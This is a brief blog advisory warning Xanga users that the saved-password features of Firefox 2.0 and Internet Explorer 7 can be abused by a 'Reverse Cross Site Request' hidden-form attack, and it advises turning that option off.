If you use Firefox 2.0 or Internet Explorer 7.0, and you want to avoid having your Xanga password stolen, you should immediately disable the "remember passwords for this site" option in these browsers.
Flaws in the way the new Firefox 2.0 and IE 7browsers' password managers handle saved usernames and passwords can be exploited to send your Xanga username and password combination to an attacker's computer without your knowledge. Called Reverse Cross Site Request (RCSR), this attack might consist of a hidden form on a malicious Xanga user's post quietly requesting your saved username and password either automatically or when you click on an offered link. Firefox 2.0 is more susceptible to this exploit because IE7 typically would not automatically fill in rogue forms with saved Xanga username/password information whereas Firefox 2.0 will.
A very good but somewhat technical explanation of this exploit can be found here.
If you have Firefox 2.0 with the "Remember Passwords for this Site" option on and want to see a dramatic but safe proof-of-concept of this exploit, visit this demo , create a fake username and password, login, and then proceed to click on the video as instructed ( this video simulates content contributed by a malicious blogger on the same domain as yours - in other words, you visiting a malicious blogger's post and clicking on a video he has posted to steal your username and password.)
Note: This is not a Xanga flaw, but the result of flaws in the browsers. And Xanga is no more prone to this attack than any other blog site. But all blog sites as a genre are extremely susceptible to this attack.
Recent Comments